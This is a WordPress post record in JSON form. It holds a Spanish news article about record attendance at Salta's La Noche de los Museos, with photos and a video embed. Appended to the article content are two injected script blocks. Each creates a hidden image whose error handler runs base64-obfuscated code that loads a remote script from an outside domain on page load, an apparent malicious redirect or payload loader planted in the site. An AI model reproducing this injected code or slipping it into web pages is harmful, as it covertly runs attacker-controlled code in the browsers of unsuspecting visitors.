{"id":4693,"date":"2024-12-16T10:48:21","date_gmt":"2024-12-16T13:48:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4693"},"modified":"2025-08-13T23:43:30","modified_gmt":"2025-08-14T02:43:30","slug":"24-728-visitantes-disfrutaron-de-la-noche-de-los-museos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4693","title":{"rendered":"24.728 visitantes disfrutaron de La Noche de los Museos"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-e6696e21597cc58432b237c2258dce61\" style=\"background-color:#1e2021\"><em>Una vez m\u00e1s el p\u00fablico dijo s\u00ed a La Noche de los Museos. Esta tradicional actividad se enmarc\u00f3 nuevamente en el ciclo Salta de Fiesta, y cont\u00f3 con la participaci\u00f3n de 23 instituciones de toda la provincia.<\/em><\/h4>\n\n\n\n<p>Marcando una cifra r\u00e9cord, m\u00e1s de 24 mil visitantes, entre salte\u00f1os y turistas, recorrieron los museos y disfrutaron de las diferentes propuestas de La Noche de los Museos. La actividad est\u00e1 organizada por la<strong>&nbsp;Secretar\u00eda de Cultura&nbsp;<\/strong>y&nbsp;tiene como objetivo visibilizar el talento de dise\u00f1adoras y dise\u00f1adores locales, ofreciendo al p\u00fablico una experiencia cultural \u00fanica durante las festividades de fin de a\u00f1o.<\/p>\n\n\n\n<p>En la ocasi\u00f3n, a la cl\u00e1sica programaci\u00f3n se sumaron, como novedad, 12 coros salte\u00f1os, sorprendiendo al p\u00fablico con m\u00fasica en vivo de diferentes repertorios.<\/p>\n\n\n\n<p>Desde las 18 horas, un p\u00fablico de todas las edades empez\u00f3 a recorrer los museos y disfrut\u00f3 de talleres, visitas guiadas especiales, espect\u00e1culos de t\u00edteres, desfiles caninos, m\u00fasica de orquestas, y recitales po\u00e9ticos, de tango y folkl\u00f3re, entre muchas otras cosas.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15322-noche-de-los-museos.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15322-noche-de-los-museos.webp\" alt=\"Noche de los museos\"\/><\/a><\/figure>\n\n\n\n<p>La actividad central fue la inauguraci\u00f3n de la Feria de Dise\u00f1o que se puede visitar hasta el 5 de enero, en el Museo Casa Arias Rengel del Complejo Explora Salta (La Florida 20).<\/p>\n\n\n\n<p>El secretario de Cultura,&nbsp;<strong>Diego Ashur<\/strong>, manifest\u00f3: \u201cNos da satisfacci\u00f3n terminar el a\u00f1o con una masiva concurrencia a los museos. Los museos son de todos y para todos, y con esa premisa trabajamos desde hace tiempo. Hoy, tanto artistas, como gestores y p\u00fablico en general son parte participativa de nuestras instituciones que nos&nbsp;permiten entender y vivenciar el patrimonio cultural,&nbsp;aprender de \u00e9l, cuidarlo y preservarlo para el futuro\u00bb.<\/p>\n\n\n\n<p>A lo largo de los a\u00f1os, y gracias al trabajo y compromiso sostenidos en el \u00e1mbito del patrimonio cultural, tanto el D\u00eda Internacional de los Museos como La Noche de los Museos, se han instalado en la agenda anual de los salte\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"24.728 visitantes disfrutaron de La Noche de los Museos\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/yy07rc8iKBc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4694\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9785-noche-de-los-museos-1024x576.webp\" alt=\"\" class=\"wp-image-4694\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9785-noche-de-los-museos-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9785-noche-de-los-museos-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9785-noche-de-los-museos-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9785-noche-de-los-museos-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9785-noche-de-los-museos-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9785-noche-de-los-museos.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4695\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9788-noche-de-los-museos-1024x576.webp\" alt=\"\" class=\"wp-image-4695\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9788-noche-de-los-museos-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9788-noche-de-los-museos-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9788-noche-de-los-museos-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9788-noche-de-los-museos-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9788-noche-de-los-museos-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9788-noche-de-los-museos.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4696\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9782-noche-de-los-museos-1024x576.webp\" alt=\"\" class=\"wp-image-4696\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9782-noche-de-los-museos-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9782-noche-de-los-museos-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9782-noche-de-los-museos-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9782-noche-de-los-museos-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9782-noche-de-los-museos-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/12\/9782-noche-de-los-museos.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Una vez m\u00e1s el p\u00fablico dijo s\u00ed a La Noche de los Museos. Esta tradicional actividad se enmarc\u00f3 nuevamente en el ciclo Salta de Fiesta, y cont\u00f3 con la participaci\u00f3n de 23 instituciones de toda la provincia. Marcando una cifra r\u00e9cord, m\u00e1s de 24 mil visitantes, entre salte\u00f1os y turistas, recorrieron los museos y disfrutaron [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4696,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-4693","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4693"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4693"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4693\/revisions"}],"predecessor-version":[{"id":6610,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4693\/revisions\/6610"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4696"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4693"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4693"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4693"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}